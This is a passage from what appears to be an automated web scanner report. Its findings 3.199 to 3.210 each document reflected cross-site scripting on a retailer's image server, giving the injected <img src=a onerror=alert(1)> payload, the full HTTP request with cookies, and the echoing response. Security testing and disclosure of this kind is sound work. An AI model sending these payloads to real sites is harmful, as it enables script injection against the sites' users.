Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:09:42 GMT
Connection: close

Unable to find /pacsunproducts/8728248_01_046905c2<img src=a onerror=alert(1)>a7b33374ab3

3.199. http://images3.pacsun.com/is/image/pacsunproducts/8728248_sw_010 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8728248_sw_010

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload d1f38<img%20src%3da%20onerror%3dalert(1)>0d292e7660b was submitted in the REST URL parameter 4. This input was echoed as d1f38<img src=a onerror=alert(1)>0d292e7660b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8728248_sw_010d1f38<img%20src%3da%20onerror%3dalert(1)>0d292e7660b?$11_product_swatch$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:09:42 GMT
Connection: close

Unable to find /pacsunproducts/8728248_sw_010d1f38<img src=a onerror=alert(1)>0d292e7660b

3.200. http://images3.pacsun.com/is/image/pacsunproducts/8728248_sw_046 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8728248_sw_046

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload ca3ba<img%20src%3da%20onerror%3dalert(1)>4586f56f06c was submitted in the REST URL parameter 4. This input was echoed as ca3ba<img src=a onerror=alert(1)>4586f56f06c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8728248_sw_046ca3ba<img%20src%3da%20onerror%3dalert(1)>4586f56f06c?$11_product_swatch$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:09:41 GMT
Connection: close

Unable to find /pacsunproducts/8728248_sw_046ca3ba<img src=a onerror=alert(1)>4586f56f06c

3.201. http://images3.pacsun.com/is/image/pacsunproducts/8728396_01_367 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8728396_01_367

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f5e01<img%20src%3da%20onerror%3dalert(1)>1dcdc06a97c was submitted in the REST URL parameter 4. This input was echoed as f5e01<img src=a onerror=alert(1)>1dcdc06a97c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8728396_01_367f5e01<img%20src%3da%20onerror%3dalert(1)>1dcdc06a97c?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:09:51 GMT
Connection: close

Unable to find /pacsunproducts/8728396_01_367f5e01<img src=a onerror=alert(1)>1dcdc06a97c

3.202. http://images3.pacsun.com/is/image/pacsunproducts/8731390_01_004 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8731390_01_004

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 744d4<img%20src%3da%20onerror%3dalert(1)>006768113df was submitted in the REST URL parameter 4. This input was echoed as 744d4<img src=a onerror=alert(1)>006768113df in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8731390_01_004744d4<img%20src%3da%20onerror%3dalert(1)>006768113df?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:10:22 GMT
Connection: close

Unable to find /pacsunproducts/8731390_01_004744d4<img src=a onerror=alert(1)>006768113df

3.203. http://images3.pacsun.com/is/image/pacsunproducts/8731390_sw_004 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8731390_sw_004

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload a27e4<img%20src%3da%20onerror%3dalert(1)>0524341e47f was submitted in the REST URL parameter 4. This input was echoed as a27e4<img src=a onerror=alert(1)>0524341e47f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8731390_sw_004a27e4<img%20src%3da%20onerror%3dalert(1)>0524341e47f?$11_product_swatch$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:10:23 GMT
Connection: close

Unable to find /pacsunproducts/8731390_sw_004a27e4<img src=a onerror=alert(1)>0524341e47f

3.204. http://images3.pacsun.com/is/image/pacsunproducts/8731390_sw_010 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8731390_sw_010

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f5e6e<img%20src%3da%20onerror%3dalert(1)>e76187f4ae1 was submitted in the REST URL parameter 4. This input was echoed as f5e6e<img src=a onerror=alert(1)>e76187f4ae1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8731390_sw_010f5e6e<img%20src%3da%20onerror%3dalert(1)>e76187f4ae1?$11_product_swatch$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:10:22 GMT
Connection: close

Unable to find /pacsunproducts/8731390_sw_010f5e6e<img src=a onerror=alert(1)>e76187f4ae1

3.205. http://images3.pacsun.com/is/image/pacsunproducts/8744260_01_060 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8744260_01_060

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload edcd6<img%20src%3da%20onerror%3dalert(1)>7a54908e509 was submitted in the REST URL parameter 4. This input was echoed as edcd6<img src=a onerror=alert(1)>7a54908e509 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8744260_01_060edcd6<img%20src%3da%20onerror%3dalert(1)>7a54908e509?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:09:45 GMT
Connection: close

Unable to find /pacsunproducts/8744260_01_060edcd6<img src=a onerror=alert(1)>7a54908e509

3.206. http://images3.pacsun.com/is/image/pacsunproducts/8744260_sw_060 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8744260_sw_060

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 48ebc<img%20src%3da%20onerror%3dalert(1)>5d2a27851a8 was submitted in the REST URL parameter 4. This input was echoed as 48ebc<img src=a onerror=alert(1)>5d2a27851a8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8744260_sw_06048ebc<img%20src%3da%20onerror%3dalert(1)>5d2a27851a8?$11_product_swatch$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:09:42 GMT
Connection: close

Unable to find /pacsunproducts/8744260_sw_06048ebc<img src=a onerror=alert(1)>5d2a27851a8

3.207. http://images3.pacsun.com/is/image/pacsunproducts/8744260_sw_089 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8744260_sw_089

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 9fd08<img%20src%3da%20onerror%3dalert(1)>c0013a8d41f was submitted in the REST URL parameter 4. This input was echoed as 9fd08<img src=a onerror=alert(1)>c0013a8d41f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8744260_sw_0899fd08<img%20src%3da%20onerror%3dalert(1)>c0013a8d41f?$11_product_swatch$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:09:42 GMT
Connection: close

Unable to find /pacsunproducts/8744260_sw_0899fd08<img src=a onerror=alert(1)>c0013a8d41f

3.208. http://images3.pacsun.com/is/image/pacsunproducts/8747909_01 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8747909_01

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 11c3f<img%20src%3da%20onerror%3dalert(1)>5ce85863144 was submitted in the REST URL parameter 4. This input was echoed as 11c3f<img src=a onerror=alert(1)>5ce85863144 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8747909_0111c3f<img%20src%3da%20onerror%3dalert(1)>5ce85863144?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:09:51 GMT
Connection: close

Unable to find /pacsunproducts/8747909_0111c3f<img src=a onerror=alert(1)>5ce85863144

3.209. http://images3.pacsun.com/is/image/pacsunproducts/8759359_01_066 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8759359_01_066

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 2ea1b<img%20src%3da%20onerror%3dalert(1)>d25a73a3da6 was submitted in the REST URL parameter 4. This input was echoed as 2ea1b<img src=a onerror=alert(1)>d25a73a3da6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8759359_01_0662ea1b<img%20src%3da%20onerror%3dalert(1)>d25a73a3da6?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:09:42 GMT
Connection: close

Unable to find /pacsunproducts/8759359_01_0662ea1b<img src=a onerror=alert(1)>d25a73a3da6

3.210. http://images3.pacsun.com/is/image/pacsunproducts/8761157_01 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8761157_01

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload e84a7<img%20src%3da%20onerror%3dalert(1)>970d3c015fe was submitted in the REST URL parameter 4. This input was echoed as e84a7<img src=a onerror=alert(1)>970d3c015fe in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8761157_01e84a7<img%20src%3da%20onerror%3dalert(1)>970d3c015fe?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
